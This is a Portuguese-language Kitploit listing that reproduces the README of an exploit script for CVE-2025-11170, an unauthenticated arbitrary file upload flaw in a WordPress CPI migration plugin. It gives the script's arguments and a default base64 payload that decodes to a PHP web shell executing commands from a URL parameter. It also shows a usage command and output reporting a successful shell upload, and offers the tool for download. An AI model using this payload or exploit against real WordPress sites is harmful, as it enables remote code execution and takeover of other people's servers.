Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-11170 — Plugin dedicado à migração do WP for CPI <= 1.0.2 - Upload Arbitrário de Arquivo Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-11170
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-11170

CVE-2025-11170

Plugin dedicado à migração do WP for CPI <= 1.0.2 - Upload Arbitrário de Arquivo Não Autenticado

Ver Repositório
2há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Upload de Arquivo Arbitrário não Autenticado

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Upload de Arquivo Arbitrário não Autenticado

📝 Descrição

O plugin WP移行専用プラグイン for CPI para WordPress é vulnerável a uploads de arquivos arbitrários devido à falta de validação de tipo de arquivo na função Cpiwm_Import_Controller::import em todas as versões até, e incluindo, a 1.0.2.
Isso permite que atacantes não autenticados realizem upload de arquivos arbitrários no servidor do site afetado, possibilitando potencialmente a execução remota de código.

🛡️ Detalhes da Vulnerabilidade

  • CVE: CVE-2025-11170
  • Pontuação CVSS: 9.8 (Crítico)
  • Vetor de Ataque: Upload remoto de arquivo não autenticado

⚡ Informações do Script

  • Nome do Script:
CVE-2025-11170.py
  • Objetivo: Exploit automatizado de upload de shell/arquivo para o plugin de migração CPI vulnerável do WordPress.
  • 🔧 Uso

    Argumentos

    ArgumentoDescrição
    -u, --urlURL base do alvo (ex.: http://target.com/wordpress/). O script anexa wp-admin/admin-ajax.php automaticamente.
    -f, --filenameNome do shell ou arquivo para fazer upload. Padrão: shell.php
    -d, --dataConteúdo do arquivo em base64 (ou texto puro). Padrão: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
    -i, --indexValor do campo index. Padrão: 0
    -H, --headersCabeçalhos HTTP extras (formato: X-Key:Value;K2:Value2)
    -t, --timeoutTempo limite para requisição HTTP (segundos). Padrão: 10
    --retriesNúmero de tentativas de repetição. Padrão: 3
    --backoffFator de espera entre tentativas (segundos). Padrão: 0.7
    -v, --verboseAumentar verbosidade para depuração (repetível)

    🚦 Métodos Explicados

    • Nxploited_parse_args
      Analisa e valida os argumentos de entrada. Garante a estrutura correta do endpoint, cabeçalhos e codificação dos dados.

    • Nxploited_logging
      Configura logs avançados e verbosidade para uma saída detalhada ou mínima em tempo de execução.

    • Nxploited_retry_session
      Inicializa uma sessão persistente com lógica de repetição e backoff para comunicações resilientes.

    • Nxploited_build_payload
      Constrói os parâmetros da requisição POST para exploração.

    • Nxploited_send
      Executa a requisição POST ao endpoint vulnerável e gerencia respostas/erros.

    • Nxploited_output_result
      Processa e formata a resposta, exibindo o caminho do shell em caso de sucesso, ou informações de depuração caso contrário.


    💡 Exemplo de Uso

    root@kitploit:~
    python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
    

    Exemplo de Saída:

    root@kitploit:~
    Uploading shell...
    Processing response...
    [+] Upload successful!
    Shell path:
    http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
    Nxploited
    My GitHub: https://github.com/Nxploited
    

    🚨 Aviso Legal

    Este script é fornecido apenas para fins educacionais.
    O uso deste exploit em alvos sem a devida autorização pode ser ilegal.
    O autor NÃO assume responsabilidade por qualquer uso indevido, danos ou consequências legais.


    📢 Contato

    GitHub: Nxploited
    Telegram: KNxploited


    Por: Nxploited ( Khaled Alenazi )

    Baixar ferramenta